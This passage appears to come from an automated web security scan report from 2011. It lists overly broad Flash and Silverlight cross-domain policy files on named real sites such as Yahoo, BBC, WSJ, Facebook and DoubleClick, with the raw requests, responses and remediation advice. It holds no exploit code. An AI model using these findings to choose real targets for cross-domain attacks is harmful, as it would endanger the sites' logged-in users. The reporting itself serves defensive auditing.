<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.google.sk" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

4.65. http://my.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:11:11 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

4.66. http://newsrss.bbc.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://newsrss.bbc.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: newsrss.bbc.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=104
Expires: Mon, 13 Jun 2011 14:47:37 GMT
Date: Mon, 13 Jun 2011 14:45:53 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
...[SNIP]...
<allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.67. http://online.wsj.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://online.wsj.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: online.wsj.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Last-Modified: Tue, 17 May 2011 13:55:25 GMT
Accept-Ranges: bytes
Content-Length: 3647
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
Keep-Alive: timeout=2, max=34
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
    <allow-access-from domain="*.doubleclick.net"/>
<allow-access-from domain="*.doubleclick.com"/>
    <allow-access-from domain="m.doubleclick.net"/>
    <allow-access-from domain="*.dowjonesonline.com"/>
    <allow-access-from domain="www.dowjonesonline.com"/>
    <allow-access-from domain="a.marketwatch.com"/>
    <allow-access-from domain="*.marketwatch.com"/>
    <allow-access-from domain="www.akamai.com"/>
    <allow-access-from domain="*.akamai.com"/>
    <allow-access-from domain="www.wsj.com"/>
    <allow-access-from domain="*.wsj.com"/>
    <allow-access-from domain="s.dev.wsj.com"/>
    <allow-access-from domain="idev.online.wsj.com"/>
    <allow-access-from domain="s.wsjsat.dowjones.net"/>
    <allow-access-from domain="s.s.dev.wsj.com"/>
<allow-access-from domain="reno.wsjqa.dowjones.net"/>
    <allow-access-from domain="*.online.wsj.com"/>
...[SNIP]...
<allow-access-from domain="quotes.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="public.wsj.com"/>
    <allow-access-from domain="*.public.wsj.com"/>
<allow-access-from domain="www.barrons.com"/>
    <allow-access-from domain="*.barrons.com"/>
...[SNIP]...
<allow-access-from domain="idev.online.barrons.com"/>
    <allow-access-from domain="*.online.barrons.com"/>
    <allow-access-from domain="online.barrons.com"/>
    <allow-access-from domain="public.barrons.com"/>
    <allow-access-from domain="*.public.barrons.com"/>
    <allow-access-from domain="*.aol.com"/>
    <allow-access-from domain="*.brightcove.com"/>
    <allow-access-from domain="creatives.doubleclick.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net" secure="true"/>
...[SNIP]...
<allow-access-from domain="wsjdigital.com"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.piclens.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.dowjones.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="online.s.dev.wsj.com"/>
    <allow-access-from domain="quotes.s.dev.wsj.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="polls.s.dev.wsj.com"/>
<allow-access-from domain="blogs.s.dev.wsj.com"/>
<allow-access-from domain="triplewebdesign.com"/>
<allow-access-from domain="ingyournumber.com"/>
   <allow-access-from domain="*.ingyournumber.com"/>
<allow-access-from domain="*.issuu.com"/>
   <allow-access-from domain="static.issuu.com"/>
    <allow-access-from domain="professional.s.dev.wsj.com"/>
    <allow-access-from domain="*.dartmotif.com"/>
    <allow-access-from domain="wsjradio.com"/>
    <allow-access-from domain="*.wsjradio.com"/>
    <allow-access-from domain="www.wsjradio.com"/>
    <allow-access-from domain="*.eyereturn.com"/>
<allow-access-from domain="fxtrader.l.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.f.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.s.dev.dowjones.com"/>
    <allow-access-from domain="fxtrader.dowjones.com"/>
    <allow-access-from domain="dowjones.visualla.com"/>
<allow-access-from domain="*.smartmoney.com"/>
<allow-access-from domain="*wsj-asia.com"/>
<allow-access-from domain="*.wsj-asia.com"/>
...[SNIP]...

4.68. http://p.opt.fimserve.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://p.opt.fimserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: p.opt.fimserve.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"695-1261547040000"
Last-Modified: Wed, 23 Dec 2009 05:44:00 GMT
Content-Type: application/xml
Content-Length: 695
Date: Tue, 14 Jun 2011 00:13:57 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="www.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ksolo.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="myspace.ksolo.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspace.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.myspacecdn.com" secure="true" />
...[SNIP]...

4.69. http://static.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.138.64.182
Date: Tue, 14 Jun 2011 00:14:25 GMT
Content-Length: 1527
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.facebook.com" />
   <allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
...[SNIP]...
<allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.70. http://us.adserver.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://us.adserver.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: us.adserver.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:35 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Thu, 07 Apr 2011 23:30:00 GMT
Accept-Ranges: bytes
Content-Length: 1934
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.sueddeutsche.de" />
<allow-access-from domain="*.ooyala.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.fwmrm.net" />
<allow-access-from domain="*.auditude.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.comcastonline.com" />
<allow-access-from domain="*.flickr.com" />
<allow-access-from domain="*.grindtv.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.maven.net" />
<allow-access-from domain="*.mavenapps.net" />
<allow-access-from domain="*.maventechnologies.com" />
<allow-access-from domain="*.mlb.com" />
<allow-access-from domain="*.overture.com" />
<allow-access-from domain="*.rivals.com" />
<allow-access-from domain="*.scrippsnewspapers.com" />
<allow-access-from domain="*.vmixcore.com" />
<allow-access-from domain="*.vmix.com" />
<allow-access-from domain="*.vipix.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="www.comcast.net" />
<allow-access-from domain="dpbaseball.comcast.net" />
<allow-access-from domain="fantasysports.comcast.net" />
<allow-access-from domain="finance.comcast.net" />
<allow-access-from domain="horoscope.comcast.net" />
<allow-access-from domain="sz0005.wc.mail.comcast.net" />
<allow-access-from domain="games.comcast.net" />
<allow-access-from domain="community.comcast.net" />
<allow-access-from domain="player.sambatech.com.br" />
<allow-access-from domain="*.zope.net" />
<allow-access-from domain="*muzu.tv" />
<allow-access-from domain="*movieclips.com" />
<allow-access-from domain="*.adap.tv" />
...[SNIP]...

4.71. http://www.facebook.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.54.142.64
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="s-static.ak.facebook.com" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="www.beta.facebook.com" />
...[SNIP]...

4.72. http://api.twitter.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 13:39:39 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 06 Jun 2011 20:41:57 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Mon, 13 Jun 2011 14:09:39 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.73. https://edit.yahoo.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   https://edit.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: edit.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:26 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 01 Nov 2010 22:44:30 GMT
Accept-Ranges: bytes
Content-Length: 235
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="open.login.yahoo.com" secure="true"/>
...[SNIP]...

4.74. http://s0.videopress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.videopress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: s0.videopress.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/x-cross-domain-policy
Date: Tue, 14 Jun 2011 00:32:02 GMT
Last-Modified: Thu, 26 May 2011 00:08:19 GMT
Server: ECS (dca/532A)
X-Cache: HIT
Content-Length: 884
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" />
...[SNIP]...
<allow-access-from domain="stats.wordpress.com" to-ports="80,443" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" />
...[SNIP]...

4.75. http://stats.wordpress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.wordpress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: stats.wordpress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 17:45:16 GMT
Content-Type: text/xml
Connection: close
Content-Length: 585
Last-Modified: Wed, 23 Jun 2010 20:40:25 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" /><allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" /><allow-access-from domain="videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" /><allow-access-from domain="realeyes.com" to-ports="80,443" />
...[SNIP]...

4.76. http://videopress.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://videopress.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: videopress.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:31:44 GMT
Content-Type: text/x-cross-domain-policy
Connection: close
Content-Length: 884
Last-Modified: Thu, 26 May 2011 00:08:10 GMT
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy><site-control permitted-cross-domain-policies="master-only" /><allow-access-from domain="v.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="v0.wordpress.com" to-ports="80,443" secure="false" />
...[SNIP]...
<allow-access-from domain="stats.wordpress.com" to-ports="80,443" />
...[SNIP]...
<allow-access-from domain="s0.videopress.com" to-ports="80,443" secure="false" />
...[SNIP]...

4.77. http://yadvertisingblog.app3.hubspot.com/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://yadvertisingblog.app3.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: yadvertisingblog.app3.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 21:47:20 GMT
Accept-Ranges: bytes
ETag: "0e4f34a711c81:ccd2"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:21:35 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

5. Silverlight cross-domain policy
There are 15 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Tue, 20 May 2008 22:28:37 GMT
Date: Mon, 13 Jun 2011 14:11:24 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1334"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://b.scorecardresearch.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Tue, 14 Jun 2011 17:45:46 GMT
Date: Mon, 13 Jun 2011 17:45:46 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.4. http://b.voicefive.com/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://mswindowswolglobal.112.2o7.net/clientaccesspolicy.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:26 GMT
Server: Omniture DC/2.0.0
xserver: www375
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
